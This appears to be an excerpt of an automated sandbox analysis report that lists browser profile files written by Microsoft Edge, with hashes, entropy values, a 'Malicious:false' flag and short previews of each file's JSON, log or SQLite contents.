                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):336
                                                                                                                                                                                                                                                                          Entropy (8bit):5.189925139138666
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:iOrv4Rr+q2PCHhJ23oH+Tcwt8a2jMGIFUtJv4MZZmwPv4ENVkwOCHhJ23oH+Tcw2:7sRSvBYeb8EFUtqg/YEz56Yeb8bJ
                                                                                                                                                                                                                                                                          MD5:0A65F0C6E7367199498C5838253E5FDF
                                                                                                                                                                                                                                                                          SHA1:F1ADC62B32A3C217174C18711CCA8ECAD1F86410
                                                                                                                                                                                                                                                                          SHA-256:DDA8FB756C077571BEDBFF05D2D42FA24B539096302E3070CE0EE16928BEE628
                                                                                                                                                                                                                                                                          SHA-512:04B601A50E094814F3D776A5623E7C70E9F5A2C54DB52F12FA58B7064199BAB8BF7A29A3935CA2C06ACD57F25767F0B4D0EFF4EB830D23578ABC1E686600C619
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2025/01/09-08:55:36.277 1a08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/09-08:55:36.278 1a08 Recovering log #3.2025/01/09-08:55:36.281 1a08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\29bb378c-8ebe-49c1-85b2-f03530cc4f14.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1961
                                                                                                                                                                                                                                                                          Entropy (8bit):5.296922421244929
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:YcCpfgCzs0T4tsRWCIs4fcKsRVleeIkBRsRECgH1Yhbt:F2fFT4zpMkeIkBJTyhx
                                                                                                                                                                                                                                                                          MD5:E38BC9D090E5AB9A52AEDDE1BED0E754
                                                                                                                                                                                                                                                                          SHA1:68970BDBC139E56F4CFDB9DC083CC04BAFE31787
                                                                                                                                                                                                                                                                          SHA-256:2F9FA28DB98BE0DDB780073CF616522536121BD31A3C78C45BF4DEE4844F5496
                                                                                                                                                                                                                                                                          SHA-512:068358B45AD0580B1329C803E25FA34C2BD15425A07516BABDC8239E03DDDC8F554AA2C48D82BC998BB6B0BC4CF4A52E472F9173A14597B95ECA5F7FFD81C59A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383496537867062","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380990941763719","port":443,"protocol_str":"quic"}],"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets2.msn.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383496542750374","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercon

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\3bb6b3a0-0e18-4705-bd61-179f2d21f0b1.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\3d09ea19-515e-45df-9dd4-0edbfc5522a6.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\66530d00-b024-494a-af64-ca737f831fe7.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\6e265250-c408-4b98-b067-e4ec17e7b54f.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\9c18fb73-78a5-4561-a624-db52db311583.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                          Entropy (8bit):2.7754741265074903
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:tTotMoco6nItyuPQBwx5mvhXcf0L/ZJVb:Vopco2ItyuUhXI0LhJVb
                                                                                                                                                                                                                                                                          MD5:846CC924746D2E53AF10A0FC90C29E87
                                                                                                                                                                                                                                                                          SHA1:B207ACCBCF94D9527036BEECC0002BA4178DB2F7
                                                                                                                                                                                                                                                                          SHA-256:18E660D45FB7A7E730697D2DB6414B7FF49D72BE7B8841A6549DDE2DD849472A
                                                                                                                                                                                                                                                                          SHA-512:B300C4624F83DEE17C5521375D596222E5DE7403B6331F70318B498BB19394462E3A3379AC839E1EBFD47096E2E8A67162193875797731328CDD6F8F9C688071
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1961
                                                                                                                                                                                                                                                                          Entropy (8bit):5.296922421244929
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:YcCpfgCzs0T4tsRWCIs4fcKsRVleeIkBRsRECgH1Yhbt:F2fFT4zpMkeIkBJTyhx
                                                                                                                                                                                                                                                                          MD5:E38BC9D090E5AB9A52AEDDE1BED0E754
                                                                                                                                                                                                                                                                          SHA1:68970BDBC139E56F4CFDB9DC083CC04BAFE31787
                                                                                                                                                                                                                                                                          SHA-256:2F9FA28DB98BE0DDB780073CF616522536121BD31A3C78C45BF4DEE4844F5496
                                                                                                                                                                                                                                                                          SHA-512:068358B45AD0580B1329C803E25FA34C2BD15425A07516BABDC8239E03DDDC8F554AA2C48D82BC998BB6B0BC4CF4A52E472F9173A14597B95ECA5F7FFD81C59A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383496537867062","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380990941763719","port":443,"protocol_str":"quic"}],"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets2.msn.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383496542750374","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercon

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):36864
                                                                                                                                                                                                                                                                          Entropy (8bit):1.439850190492089
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:T6IopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBMLV:OIEumQv8m1ccnvS6Qm4peztAs1a
                                                                                                                                                                                                                                                                          MD5:95C559D00A09892E14BE21DFFA1C9156
                                                                                                                                                                                                                                                                          SHA1:16E3D4B44A0CFE25828BD48896C3C89A294562EC
                                                                                                                                                                                                                                                                          SHA-256:3E4EAB41DA5EE484B87AB0D0B03116AAFD720892FC8E35FDAB250C277B7588DD
                                                                                                                                                                                                                                                                          SHA-512:3C3C26EED53206DC7A4F4C208352EEBF1975C6977E00ABD667FD19C4DA0D9F03247130796B6F7FE1236A26862179C2CE5D0454855D2A9A90F9D3FC435B55AA94
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF39982.TMP (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3a624.TMP (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3b046.TMP (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                          Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                          MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                          SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                          SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                          SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):13612
                                                                                                                                                                                                                                                                          Entropy (8bit):5.239382828551976
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:stbJ99QTryDigabatSuypXskrXIa34HkgYYUQ1i8CbV+FCwQwd4Cbq7NIaPfYJ:stbPGKSu4XskrXXrbGJQwmCm7NIj
                                                                                                                                                                                                                                                                          MD5:F73F00C757A5C884BC03C2E263C3F174
                                                                                                                                                                                                                                                                          SHA1:BD943C6EB9312EA3A3D32E098F73E61A639FD349
                                                                                                                                                                                                                                                                          SHA-256:F6FFF2EB599E8A043A7DE7799BFABE05B72A4BDD25A028B534430EE012C6FB34
                                                                                                                                                                                                                                                                          SHA-512:D4D643C7AAC62BB31C8903F405982A66695A100A4CE248729A5955484521EF370ADE2A009FD3FBCD0FC1DD17F8411812D62F58662E9CD0C1E03D3C81D2846140
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380904536315242","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3ceea.TMP (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):13612
                                                                                                                                                                                                                                                                          Entropy (8bit):5.239382828551976
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:stbJ99QTryDigabatSuypXskrXIa34HkgYYUQ1i8CbV+FCwQwd4Cbq7NIaPfYJ:stbPGKSu4XskrXXrbGJQwmCm7NIj
                                                                                                                                                                                                                                                                          MD5:F73F00C757A5C884BC03C2E263C3F174
                                                                                                                                                                                                                                                                          SHA1:BD943C6EB9312EA3A3D32E098F73E61A639FD349
                                                                                                                                                                                                                                                                          SHA-256:F6FFF2EB599E8A043A7DE7799BFABE05B72A4BDD25A028B534430EE012C6FB34
                                                                                                                                                                                                                                                                          SHA-512:D4D643C7AAC62BB31C8903F405982A66695A100A4CE248729A5955484521EF370ADE2A009FD3FBCD0FC1DD17F8411812D62F58662E9CD0C1E03D3C81D2846140
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380904536315242","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF41c2f.TMP (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):13612
                                                                                                                                                                                                                                                                          Entropy (8bit):5.239382828551976
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:stbJ99QTryDigabatSuypXskrXIa34HkgYYUQ1i8CbV+FCwQwd4Cbq7NIaPfYJ:stbPGKSu4XskrXXrbGJQwmCm7NIj
